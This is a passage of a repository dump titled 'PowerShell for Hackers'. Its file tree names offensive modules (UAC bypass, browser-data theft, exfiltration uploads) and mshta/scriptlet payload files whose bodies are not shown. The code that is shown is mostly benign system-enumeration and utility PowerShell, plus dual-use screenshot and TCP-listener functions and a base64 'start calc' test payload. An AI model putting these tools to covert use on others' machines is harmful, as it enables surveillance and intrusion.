├── Assets ├── placeholder ├── Scripts │ ├── v.txt │ ├── ov.txt │ ├── Powershell-2-Ducky │ │ ├── v.txt │ │ ├── placeholder │ │ └── ReadMe.md │ └── P-2-Ducky.ps1 ├── calc.txt ├── images │ ├── placeholder │ ├── dns-records.png │ ├── thumbnail.png │ └── hello.svg ├── b64.txt ├── calc.b64 ├── Ducky-Ex.jpg ├── JakobyDancing.gif ├── wtf.hta ├── c.hta ├── mshta.sct ├── wtf.sct ├── rev.xsl └── template.md ├── VideoNotes ├── assets │ ├── placeholder │ ├── diff.png │ └── thumbnail.png ├── getMotherboard.md ├── listIPV6.md ├── listModules.md ├── Test-SshConnection.ps1 ├── getInstalledSoftware.md ├── Ensure-ProfileExists.ps1 ├── listInstalledLanguages.md ├── findEmptyFiles ├── findHiddenFiles.md ├── findEncryptedFiles.md ├── findEmptyFolders.md ├── write-host.ps1 ├── shortestParameter.md ├── Write-Host2echo.md ├── FileHashInAds.md ├── OpenFormsOnSecondaryMonitors.ps1 ├── Invoke-ScriptBlockAtPosition.md ├── listPsProfiles.md ├── function Start-TcpListener.ps1 ├── takeScreenShot.md ├── Update-VariableValue.ps1 ├── htmlRenderer.ps1 ├── polyglot.md ├── Convert-Cmdlet.md ├── shortestAlias.md ├── passwordEncryption.md ├── compression.md ├── cGpt.txt ├── Convert-ImageToHtml.ps1 ├── PsChat.md ├── ImgDecon.md ├── CertManagmentGuide.md ├── Convert-ImageToAscii.ps1 ├── lsbSteggo.md ├── ChatGPT-Powershell.md ├── psChat.md ├── sendTCP.md └── Where-To-Start │ └── quiz.ps1 └── Functions ├── 123.ps1 ├── FunctionsThatShouldNotExist.md ├── honeypot.md ├── Def_Protocol_HNDLR.md ├── DefaultBrowser.md ├── Minimize-Apps.md ├── PlaySound.md ├── Speak.md ├── Clean-Exfil.md ├── Hide-Msg.md ├── PowerShell-2-Batch.md ├── Set-Volume.md ├── If-Admin.md ├── MsgBox.md ├── txt-img.md ├── Discord-Upload.md ├── Abuse-CapsLock.md ├── Url-2-Ascii.md ├── Get-GeoLocation.md ├── DropBox-Upload.md ├── Invoke-WebRequest.md ├── B64.md ├── B64-img.md ├── Get-BrowserData.md ├── Detect-Mouse-Movement.md ├── ns-lookup.md ├── Add-Network.md ├── Set-WallPaper.md ├── Wifi-Info.md └── UAC-Bypass.md /Assets/placeholder: 
-------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assets/Scripts/v.txt: -------------------------------------------------------------------------------- 1 | 1.0 2 | -------------------------------------------------------------------------------- /Assets/calc.txt: -------------------------------------------------------------------------------- 1 | calc 2 | -------------------------------------------------------------------------------- /Assets/Scripts/ov.txt: -------------------------------------------------------------------------------- 1 | 1.0 2 | -------------------------------------------------------------------------------- /Assets/images/placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /VideoNotes/assets/placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assets/Scripts/Powershell-2-Ducky/v.txt: -------------------------------------------------------------------------------- 1 | 1.0 2 | -------------------------------------------------------------------------------- /Assets/b64.txt: -------------------------------------------------------------------------------- 1 | cwB0AGEAcgB0ACAAYwBhAGwAYwA= 2 | -------------------------------------------------------------------------------- /Assets/calc.b64: -------------------------------------------------------------------------------- 1 | cwB0AGEAcgB0ACAAYwBhAGwAYwA= 2 | -------------------------------------------------------------------------------- /Assets/Scripts/Powershell-2-Ducky/placeholder: -------------------------------------------------------------------------------- 1 | 2 | 
-------------------------------------------------------------------------------- /Assets/Ducky-Ex.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/Ducky-Ex.jpg -------------------------------------------------------------------------------- /Functions/123.ps1: -------------------------------------------------------------------------------- 1 | function cookie { 2 | write-host "Cooookies" -foregroundcolor 'green' 3 | calc 4 | } 5 | -------------------------------------------------------------------------------- /Assets/JakobyDancing.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/JakobyDancing.gif -------------------------------------------------------------------------------- /VideoNotes/assets/diff.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/VideoNotes/assets/diff.png -------------------------------------------------------------------------------- /Assets/images/dns-records.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/images/dns-records.png -------------------------------------------------------------------------------- /Assets/images/thumbnail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/Assets/images/thumbnail.png -------------------------------------------------------------------------------- /VideoNotes/assets/thumbnail.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/I-Am-Jakoby/PowerShell-for-Hackers/HEAD/VideoNotes/assets/thumbnail.png -------------------------------------------------------------------------------- /VideoNotes/getMotherboard.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | try { 6 | Get-WmiObject -Class Win32_BaseBoard 7 | } catch { 8 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 9 | } 10 | ``` 11 | -------------------------------------------------------------------------------- /VideoNotes/listIPV6.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | try { 6 | Get-NetAdapterBinding -name '*' -componentID 'ms_tcpip6' | Format-Table -autoSize -property Name,Enabled 7 | } catch { 8 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 9 | } 10 | ``` 11 | -------------------------------------------------------------------------------- /Assets/wtf.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Assets/c.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 10 | 11 | 12 | Nothing to see here.. 13 | 14 | 15 | -------------------------------------------------------------------------------- /VideoNotes/listModules.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | try { 6 | $modules = Get-Module -ListAvailable 7 | if ($modules) { 8 | $modules | Select-Object Name, Version, ModuleType, ExportedCommands | Format-Table -AutoSize 9 | } else { 10 | "No modules available." 
11 | } 12 | } catch { 13 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 14 | } 15 | 16 | ``` 17 | -------------------------------------------------------------------------------- /Assets/mshta.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 16 | 17 | -------------------------------------------------------------------------------- /VideoNotes/Test-SshConnection.ps1: -------------------------------------------------------------------------------- 1 | function Test-SshConnection { 2 | param ( 3 | [string]$IpAddress, 4 | [int]$Port = 22 5 | ) 6 | 7 | $result = Test-NetConnection -ComputerName $IpAddress -Port $Port 8 | 9 | if ($result.TcpTestSucceeded) { 10 | Write-Host "SSH port on $IpAddress is open." 11 | return $true 12 | } else { 13 | Write-Host "SSH port on $IpAddress is closed or unreachable." 14 | return $false 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /VideoNotes/getInstalledSoftware.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | try { 5 | Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*, HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*, HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | select-object DisplayName,DisplayVersion,InstallDate | Format-Table -autoSize 6 | exit 0 # success 7 | } catch { 8 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 9 | exit 1 10 | } 11 | ``` 12 | -------------------------------------------------------------------------------- /Assets/wtf.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 13 | 14 | -------------------------------------------------------------------------------- /VideoNotes/Ensure-ProfileExists.ps1: 
-------------------------------------------------------------------------------- 1 | function Ensure-ProfileExists { 2 | # Check if the profile file exists 3 | if (-not (Test-Path -Path $PROFILE)) { 4 | # If the profile doesn't exist, create it along with the directory if necessary 5 | $profileDirectory = Split-Path -Path $PROFILE 6 | if (-not (Test-Path -Path $profileDirectory)) { 7 | New-Item -ItemType Directory -Path $profileDirectory -Force 8 | } 9 | New-Item -ItemType File -Path $PROFILE -Force 10 | Write-Host "Profile created at $PROFILE" 11 | } else { 12 | Write-Host "Profile already exists at $PROFILE" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /VideoNotes/listInstalledLanguages.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | function ListInstalledLanguages { 6 | $List = Get-WinUserLanguageList 7 | foreach ($Item in $List) { 8 | New-Object PSObject -property @{ 'Tag' = "$($Item.LanguageTag)"; 'Autonym' = "$($Item.Autonym)"; 'English' = "$($Item.EnglishName)"; 'Spellchecking' = "$($Item.Spellchecking)"; 'Handwriting' = "$($Item.Handwriting)" } 9 | } 10 | } 11 | 12 | try { 13 | ListInstalledLanguages | Format-Table -property Tag,Autonym,English,Spellchecking,Handwriting 14 | exit 0 # success 15 | } catch { 16 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 17 | exit 1 18 | } 19 | ``` 20 | -------------------------------------------------------------------------------- /VideoNotes/findEmptyFiles: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | param([string]$path = "$PWD") 5 | 6 | try { 7 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 8 | 9 | $path = Resolve-Path "$path" 10 | Write-Progress "Scanning $path for empty files..." 
11 | [int]$count = 0 12 | Get-ChildItem $path -attributes !Directory -recurse | where {$_.Length -eq 0} | Foreach-Object { 13 | "📄$($_.FullName)" 14 | $count++ 15 | } 16 | Write-Progress -completed " " 17 | [int]$elapsed = $stopWatch.Elapsed.TotalSeconds 18 | "✔️ Found $count empty files within $path in $elapsed sec" 19 | } catch { 20 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 21 | } 22 | ``` 23 | -------------------------------------------------------------------------------- /VideoNotes/findHiddenFiles.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | param([string]$path = "$PWD") 5 | 6 | try { 7 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 8 | 9 | $path = Resolve-Path "$path" 10 | Write-Progress "Scanning $path for hidden files..." 11 | [int]$count = 0 12 | Get-ChildItem "$path" -attributes Hidden -recurse | Foreach-Object { 13 | "📄$($_.FullName)" 14 | $count++ 15 | } 16 | Write-Progress -completed " " 17 | [int]$elapsed = $stopWatch.Elapsed.TotalSeconds 18 | "✔️ Found $count hidden files within 📂$path in $elapsed sec" 19 | exit 0 # success 20 | } catch { 21 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 22 | exit 1 23 | } 24 | ``` 25 | -------------------------------------------------------------------------------- /VideoNotes/findEncryptedFiles.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | param([string]$path = "$PWD") 6 | 7 | try { 8 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 9 | 10 | $path = Resolve-Path "$path" 11 | Write-Progress "Scanning $path for encrypted files..." 
12 | [int]$count = 0 13 | Get-ChildItem "$path" -attributes Encrypted -recurse | Foreach-Object { 14 | "📄$($_.FullName)" 15 | $count++ 16 | } 17 | Write-Progress -completed " " 18 | [int]$elapsed = $stopWatch.Elapsed.TotalSeconds 19 | "✔️ Found $count encrypted files within 📂$path in $elapsed sec" 20 | exit 0 # success 21 | } catch { 22 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 23 | exit 1 24 | } 25 | ``` 26 | -------------------------------------------------------------------------------- /VideoNotes/findEmptyFolders.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | param([string]$path = "$PWD") 5 | 6 | try { 7 | $stopWatch = [system.diagnostics.stopwatch]::startNew() 8 | 9 | $path = Resolve-Path "$path" 10 | Write-Progress "Scanning $path for empty folders..." 11 | [int]$count = 0 12 | Get-ChildItem "$path" -attributes Directory -recurse -force | Where-Object { @(Get-ChildItem $_.FullName -force).Count -eq 0 } | ForEach-Object { 13 | "📂$($_.FullName)" 14 | $count++ 15 | } 16 | Write-Progress -completed " " 17 | [int]$Elapsed = $stopWatch.Elapsed.TotalSeconds 18 | "✔️ Found $count empty directories within 📂$path in $elapsed sec" 19 | exit 0 # success 20 | } catch { 21 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 22 | exit 1 23 | } 24 | ``` 25 | -------------------------------------------------------------------------------- /VideoNotes/write-host.ps1: -------------------------------------------------------------------------------- 1 | function Write-Host { 2 | [CmdletBinding()] 3 | param( 4 | [Parameter(Mandatory=$false, ValueFromRemainingArguments=$true)] 5 | [Object[]] 6 | $Object, 7 | 8 | [ConsoleColor] 9 | $ForegroundColor, 10 | 11 | [ConsoleColor] 12 | $BackgroundColor, 13 | 14 | [switch] 15 | $NoNewline, 16 | 17 | [string] 18 | $LogPath 19 | ) 20 | 21 | # Convert objects to a single string 22 | $output = $Object -join ' ' 23 | 24 | # 
Call the original Write-Host with the parameters 25 | Microsoft.PowerShell.Utility\Write-Host $output -ForegroundColor $ForegroundColor -BackgroundColor $BackgroundColor -NoNewline:$NoNewline 26 | 27 | # Custom logic for logging 28 | if ($LogPath) { 29 | Add-Content -Path $LogPath -Value $output 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /VideoNotes/shortestParameter.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | function Get-ShortestParameterAlias { 5 | param ( 6 | [Parameter(Mandatory)] 7 | [string]$CmdletName 8 | ) 9 | 10 | $cmdlet = Get-Command $CmdletName 11 | $parameters = $cmdlet.Parameters.Keys 12 | $shortestAliases = @{} 13 | 14 | foreach ($parameter in $parameters) { 15 | for ($i = 1; $i -le $parameter.Length; $i++) { 16 | $prefix = $parameter.Substring(0, $i) 17 | $matchingParams = $parameters | Where-Object { $_ -like "$prefix*" } 18 | 19 | if ($matchingParams.Count -eq 1) { 20 | $shortestAliases[$parameter] = "-$prefix" 21 | break 22 | } 23 | } 24 | } 25 | 26 | return $shortestAliases 27 | } 28 | 29 | # Example usage 30 | $shortestAliases = Get-ShortestParameterAlias -CmdletName "Get-ChildItem" 31 | $shortestAliases.GetEnumerator() | Format-Table -AutoSize 32 | 33 | ``` 34 | -------------------------------------------------------------------------------- /VideoNotes/Write-Host2echo.md: -------------------------------------------------------------------------------- 1 | $writeHostCommands = $ast.FindAll({ 2 | param($node) 3 | $node -is [System.Management.Automation.Language.CommandAst] -and 4 | $node.GetCommandName() -eq 'Write-Host' 5 | }, $true) 6 | 7 | # Replace each Write-Host with echo, keeping the first argument 8 | foreach ($command in $writeHostCommands) { 9 | $commandExtent = $command.Extent 10 | $commandText = $commandExtent.Text 11 | 12 | # Extract the first argument (if exists) 13 | $firstArgument = 
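$command.CommandElements[1].Extent.Text -replace '^\s+', '' # Remove leading whitespace 14 | 15 | # Create the echo command with the first argument 16 | $echoCommand = "echo $firstArgument" 17 | 18 | # Replace the command text with 'echo' and first argument 19 | $scriptContent = $scriptContent.Replace($commandText, $echoCommand) 20 | } 21 | -------------------------------------------------------------------------------- /VideoNotes/FileHashInAds.md: --------------------------------------------------------------------------------
```powershell
function Set-FileHashInADS {
    <#
    .SYNOPSIS
    Computes the SHA256 hash of a file and stores it in an alternate data stream named 'hash' on that file.

    .DESCRIPTION
    Get-FileHash reads the file's main content, so adding the stream does not change
    the value it reports. The stream is stored on the file itself: anyone who can
    write to the file can rewrite the stored hash too, so a matching value shows the
    content was not changed by accident, not that it was not tampered with.
    Alternate data streams are an NTFS feature; the stream is dropped when the file
    is copied to a file system that does not support them.

    .PARAMETER FilePath
    Path of the file to hash. Taken literally (no wildcard expansion).
    #>
    param (
        [Parameter(Mandatory=$true)]
        [string]$FilePath
    )

    # Require an existing file; a directory passes a plain Test-Path but cannot be hashed
    if (-not (Test-Path -LiteralPath $FilePath -PathType Leaf)) {
        Write-Error "File not found: $FilePath"
        return
    }

    # Calculate the hash of the file.
    # -ErrorAction Stop turns the cmdlet's non-terminating errors into exceptions;
    # without it the catch block is never reached.
    $fileHash = $null
    try {
        $fileHash = Get-FileHash -LiteralPath $FilePath -Algorithm SHA256 -ErrorAction Stop |
            Select-Object -ExpandProperty Hash
    } catch {
        Write-Error "Failed to calculate hash for file: $FilePath. Error: $_"
        return
    }

    # Create/overwrite the ADS named 'hash' with the file hash.
    # -Stream names the stream explicitly instead of building a "path:stream" string,
    # and -ErrorAction Stop keeps the success message from printing after a failed write.
    try {
        Set-Content -LiteralPath $FilePath -Stream 'hash' -Value $fileHash -ErrorAction Stop
        Write-Host "Hash stored in alternate data stream 'hash' for file $FilePath"
    } catch {
        Write-Error "Failed to write hash to alternate data stream for file: $FilePath. Error: $_"
    }
}
```
-------------------------------------------------------------------------------- /VideoNotes/OpenFormsOnSecondaryMonitors.ps1: -------------------------------------------------------------------------------- 1 | function OpenFormsOnSecondaryMonitors { 2 | [CmdletBinding()] 3 | param () 4 | 5 | process { 6 | # Load System.Windows.Forms assembly for accessing monitor details and form handling 7 | Add-Type -AssemblyName System.Windows.Forms 8 | 9 | # Retrieve all screens connected to the system 10 | $screens = [System.Windows.Forms.Screen]::AllScreens 11 | 12 | # Iterate through each screen and open a form if it's not the primary monitor 13 | foreach ($screen in $screens) { 14 | if (-not $screen.Primary) { 15 | # Create a new form 16 | $form = New-Object System.Windows.Forms.Form 17 | $form.Text = "Secondary Monitor Form - $($screen.DeviceName)" 18 | $form.WindowState = 'Maximized' 19 | $form.FormBorderStyle = 'None' 20 | $form.StartPosition = 'Manual' 21 | $form.Bounds = $screen.Bounds 22 | 23 | # Show the form 24 | $form.Show() 25 | } 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /VideoNotes/Invoke-ScriptBlockAtPosition.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | function Invoke-ScriptBlockAtPosition { 3 | param ( 4 | [Parameter(Mandatory)] 5 | [scriptblock]$ScriptBlock, 6 | 7 | [int]$X = 0, 8 | [int]$Y = 0 9 | ) 10 | 11 | # Save current cursor position to restore later 12 | $originalPosition = $Host.UI.RawUI.CursorPosition 13 | 14 | try { 15 | # Set cursor position 16 | $newPosition = New-Object System.Management.Automation.Host.Coordinates $X, $Y 17 | $Host.UI.RawUI.CursorPosition = $newPosition 18 | 19 | # Invoke the script block 20 | & $ScriptBlock 21 | } 22 | finally { 23 | # Restore original cursor position 24 | $Host.UI.RawUI.CursorPosition = $originalPosition 25 | } 26 | } 27 | 28 | ``` 29 | 30 | 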
31 | ```powershell 32 | # Example script block 33 | $scriptBlock = { 34 | Write-Host "This is a test output." 35 | # Additional commands can be added here 36 | } 37 | 38 | # Invoke the script block at position (X: 10, Y: 5) 39 | Invoke-ScriptBlockAtPosition -ScriptBlock $scriptBlock -X 10 -Y 5 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /Functions/FunctionsThatShouldNotExist.md: -------------------------------------------------------------------------------- 1 | # Functions That Should Not Exist 2 | 3 | ## Replacing ( - and _ ) in Variable Names with Spaces 4 | 5 | ```powershell 6 | function Replace-DashesAndUnderscores { 7 | param ( 8 | [string]$InputString 9 | ) 10 | 11 | # Parse the input string into an AST 12 | $ast = [System.Management.Automation.Language.Parser]::ParseInput($InputString, [ref]$null, [ref]$null) 13 | 14 | # Find all function names in the AST 15 | $functionNames = $ast.FindAll({ 16 | $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] 17 | }, $true) 18 | 19 | # Replace '-' and '_' in function names with ' ' 20 | foreach ($function in $functionNames) { 21 | $functionName = $function.Name 22 | $newFunctionName = $functionName -replace '[-_]', ' ' 23 | $InputString = $InputString -replace [regex]::Escape($functionName), $newFunctionName 24 | } 25 | 26 | return $InputString 27 | } 28 | ``` 29 | 30 | ## Convert Switch Statement into Multiple If Statements 31 | 32 | ```powershell 33 | ** Code here 34 | ``` 35 | 36 | ## Camel Case the Whole Script 37 | 38 | ```powershell 39 | ** Code here 40 | ``` 41 | -------------------------------------------------------------------------------- /VideoNotes/listPsProfiles.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ```powershell 4 | function Get-PowerShellProfileDetails { 5 | try { 6 | $profilePaths = @{ 7 | AllUsersAllHosts = $PROFILE.AllUsersAllHosts 8 | AllUsersCurrentHost = 
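$PROFILE.AllUsersCurrentHost 9 | CurrentUserAllHosts = $PROFILE.CurrentUserAllHosts 10 | CurrentUserCurrentHost = $PROFILE.CurrentUserCurrentHost 11 | } 12 | 13 | $level = 1 14 | $profiles = foreach ($key in $profilePaths.Keys) { 15 | $location = $profilePaths[$key] 16 | $existent = if (Test-Path $location) { "True" } else { "False" } 17 | New-Object PSObject -Property @{ 18 | Level = $level 19 | Profile = $key 20 | Location = $location 21 | Existent = $existent 22 | ParentFolder = Split-Path $location -Parent 23 | } 24 | $level++ 25 | } 26 | 27 | $profiles | Select-Object Profile, Level, Location, Existent, ParentFolder 28 | } catch { 29 | "⚠️ Error in line $($_.InvocationInfo.ScriptLineNumber): $($Error[0])" 30 | } 31 | } 32 | 33 | ``` 34 | 35 | -------------------------------------------------------------------------------- /VideoNotes/function Start-TcpListener.ps1: --------------------------------------------------------------------------------
function Start-TcpListener {
    <#
    .SYNOPSIS
    Accepts TCP connections one at a time and appends the text each client sends to a log file.

    .DESCRIPTION
    The listener binds to 0.0.0.0, i.e. every local interface, and performs no
    authentication, so whatever arrives is untrusted. Each connection is read with a
    time limit and a size limit; without them a client that never closes the
    connection blocks the loop indefinitely, and a client that keeps sending grows
    memory without bound. The received text is written to the log unmodified and may
    contain line breaks or control characters, so anything that later parses or
    displays the log must treat its content as attacker-controlled.

    .PARAMETER Port
    TCP port to listen on.

    .PARAMETER LogFile
    File the received text is appended to. Its parent directory is created if missing.

    .PARAMETER MaxChars
    Upper bound on the characters kept from one connection; the rest is discarded.

    .PARAMETER ReadTimeoutMs
    Milliseconds a single read may wait for data before the connection is dropped.
    #>
    param(
        [int]$Port = 80,
        [string]$LogFile = "root\logs\log.txt",
        [int]$MaxChars = 1048576,
        [int]$ReadTimeoutMs = 10000
    )

    # Ensure the logs directory exists. Split-Path returns an empty string for a bare
    # file name, which Test-Path rejects, so the check is skipped in that case.
    $logDir = Split-Path -Path $LogFile -Parent
    if ($logDir -and -not (Test-Path -Path $logDir)) {
        New-Item -ItemType Directory -Path $logDir
    }

    # One listener for the whole run; re-creating it per connection closes the port
    # between clients.
    $listener = New-Object System.Net.Sockets.TcpListener '0.0.0.0', $Port

    try {
        $listener.Start()

        # Loop to keep the listener running
        while ($true) {
            # Wait for a client connection
            $client = $listener.AcceptTcpClient()

            try {
                $stream = $client.GetStream()
                $stream.ReadTimeout = $ReadTimeoutMs
                $reader = New-Object System.IO.StreamReader($stream)

                # Bounded read instead of ReadToEnd()
                $text = New-Object System.Text.StringBuilder
                $chunk = New-Object char[] 4096
                try {
                    while ($text.Length -lt $MaxChars) {
                        $want = [Math]::Min($chunk.Length, $MaxChars - $text.Length)
                        $got = $reader.Read($chunk, 0, $want)
                        if ($got -le 0) { break }   # client closed the connection
                        [void]$text.Append($chunk, 0, $got)
                    }
                } catch [System.IO.IOException] {
                    # Read timed out or the connection was reset: keep what arrived so far
                }

                # Append data to the log file
                Add-Content -Path $LogFile -Value $text.ToString()
            }
            finally {
                # Closing the client also closes its stream, even when reading or logging failed
                $client.Close()
            }
        }
    }
    finally {
        $listener.Stop()
    }
}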
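-------------------------------------------------------------------------------- /Functions/honeypot.md: --------------------------------------------------------------------------------
```powershell
function Set-HoneyPot {
    <#
    .SYNOPSIS
    Watches one decoy file and prints a line for every file-system event raised for it.

    .DESCRIPTION
    Creates a System.IO.FileSystemWatcher for C:\temp\file.txt and blocks until the
    script is interrupted, then removes its event subscriptions.
    The NotifyFilter is LastWrite + FileName, so writes, creation, deletion and
    renames are reported. With this filter, opening or reading the file raises no
    event; noticing reads requires file-access auditing on the file instead.

    .PARAMETER event
    Watcher event to subscribe to. When omitted, Created, Changed, Deleted and
    Renamed are all subscribed.
    #>
    Param(
        [Parameter(Mandatory=$false)]
        [ValidateSet('Created', 'Changed', 'Deleted', 'Renamed', 'Error')]
        [string]$event
    )

    # Define the path to the file you want to monitor
    $file = "C:\temp\file.txt"
    $folder = Split-Path -Path $file -Parent

    # The watcher cannot be pointed at a folder that does not exist; stop here
    # instead of looping forever while watching nothing.
    if (-not (Test-Path -LiteralPath $folder -PathType Container)) {
        throw "Folder to watch does not exist: $folder"
    }

    # Define the action that should be taken when the file changes.
    # $Event in this block is the automatic variable PowerShell provides to event
    # actions, not this function's -event parameter.
    $action = {
        $details = $Event.SourceEventArgs
        if ($details -is [System.IO.ErrorEventArgs]) {
            Write-Host "Error: $($details.GetException().Message)"
        } else {
            Write-Host "$($details.ChangeType): $($details.FullPath)"
        }
    }

    # Create a new FileSystemWatcher object
    $watcher = New-Object System.IO.FileSystemWatcher
    $watcher.Path = $folder
    $watcher.Filter = Split-Path -Path $file -Leaf
    $watcher.IncludeSubdirectories = $false
    $watcher.NotifyFilter = [System.IO.NotifyFilters]::LastWrite -bor [System.IO.NotifyFilters]::FileName

    # An omitted -event used to reach Register-ObjectEvent as an empty name, leaving
    # nothing registered; subscribe to every file event in that case.
    if ($event) {
        $eventNames = @($event)
    } else {
        $eventNames = @('Created', 'Changed', 'Deleted', 'Renamed')
    }

    $registered = @()
    try {
        # Register the event watcher
        foreach ($name in $eventNames) {
            # A single requested event keeps the identifier 'FileChangedEvent'
            if ($eventNames.Count -eq 1) {
                $id = 'FileChangedEvent'
            } else {
                $id = "FileChangedEvent.$name"
            }
            Register-ObjectEvent -InputObject $watcher -EventName $name -Action $action -SourceIdentifier $id -ErrorAction Stop
            $registered += $id
        }
        $watcher.EnableRaisingEvents = $true

        # Keep the script running until the user stops it manually
        while ($true) {
            Start-Sleep -Seconds 1
        }
    }
    finally {
        # Runs when the loop is interrupted; code placed after the infinite loop is never reached
        foreach ($id in $registered) {
            Unregister-Event -SourceIdentifier $id -ErrorAction SilentlyContinue
        }
        $watcher.Dispose()
    }
}
```
-------------------------------------------------------------------------------- /VideoNotes/takeScreenShot.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ```powershell 5 | function Take-Screenshot { 6 | param( 7 | 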
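[string]$FilePath = "" 8 | ) 9 | 10 | # Determine the default file path if not provided 11 | if ($FilePath -eq "") { 12 | $PicturesPath = [Environment]::GetFolderPath('MyPictures') 13 | $ScreenshotsPath = Join-Path $PicturesPath "Screenshots" 14 | 15 | # Create Screenshots folder if it doesn't exist 16 | if (-not (Test-Path $ScreenshotsPath -PathType Container)) { 17 | New-Item -Path $ScreenshotsPath -ItemType Directory | Out-Null 18 | } 19 | 20 | $Time = Get-Date 21 | $Filename = "$($Time.Year)-$($Time.Month)-$($Time.Day)T$($Time.Hour)-$($Time.Minute)-$($Time.Second).png" 22 | $FilePath = Join-Path $ScreenshotsPath $Filename 23 | } 24 | 25 | try { 26 | Add-Type -Assembly System.Windows.Forms 27 | $ScreenBounds = [System.Windows.Forms.SystemInformation]::VirtualScreen 28 | $ScreenshotObject = New-Object System.Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height 29 | $DrawingGraphics = [System.Drawing.Graphics]::FromImage($ScreenshotObject) 30 | $DrawingGraphics.CopyFromScreen($ScreenBounds.Location, [System.Drawing.Point]::Empty, $ScreenBounds.Size) 31 | $ScreenshotObject.Save($FilePath) 32 | $ScreenshotObject.Dispose() 33 | $DrawingGraphics.Dispose() 34 | 35 | Write-Output "✔️ Screenshot saved to $FilePath" 36 | } catch { 37 | Write-Error "⚠️ Error in taking screenshot: $($_.Exception.Message)" 38 | } 39 | } 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /VideoNotes/Update-VariableValue.ps1: --------------------------------------------------------------------------------
function Update-VariableValue {
    <#
    .SYNOPSIS
    Rewrites the assignments to one variable in a PowerShell script file so that they assign a new string literal.

    .DESCRIPTION
    Parses the file into an AST, finds every assignment statement whose left-hand
    side is the named variable, and replaces each whole statement with
    $Name = '<value>'. The file is a script that will be executed later (the default
    target is a profile script), so both the name and the value are spliced into
    code: the name is validated and the value is escaped for a single-quoted literal.
    Without the escaping, a quote character inside the value would end the literal
    and the remainder would be parsed as script.

    .PARAMETER FilePath
    Script file to modify in place.

    .PARAMETER VariableName
    Variable name without the leading '$'; a scope or drive prefix such as
    'global:name' is accepted.

    .PARAMETER NewValue
    Text assigned to the variable as a single-quoted string.
    #>
    param (
        [string]$FilePath = "/root/.config/powershell/Microsoft.PowerShell_profile.ps1",
        [string]$VariableName = "lastUpdate",
        [string]$NewValue = "your_new_value_here"
    )

    # The name becomes code in the target file; accept only a plain identifier
    # with an optional scope/drive prefix.
    if ($VariableName -notmatch '\A\w+(:\w+)?\z') {
        throw "Invalid variable name: $VariableName"
    }

    # Read the script from the file
    $script = [System.IO.File]::ReadAllText($FilePath)

    # Parse the script into an AST
    $ast = [System.Management.Automation.Language.Parser]::ParseInput($script, [ref]$null, [ref]$null)

    # Find all Assignment Statements
    $assignments = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.AssignmentStatementAst] }, $true)

    # Filter for the specific variable, ordered by position in the file
    $targets = @($assignments |
        Where-Object { $_.Left.VariablePath.UserPath -eq $VariableName } |
        Sort-Object { $_.Extent.StartOffset })

    if ($targets.Count -eq 0) {
        Write-Output "`$$VariableName variable not found in $FilePath"
        return
    }

    # Keep only statements that are not nested inside an earlier match; the outer
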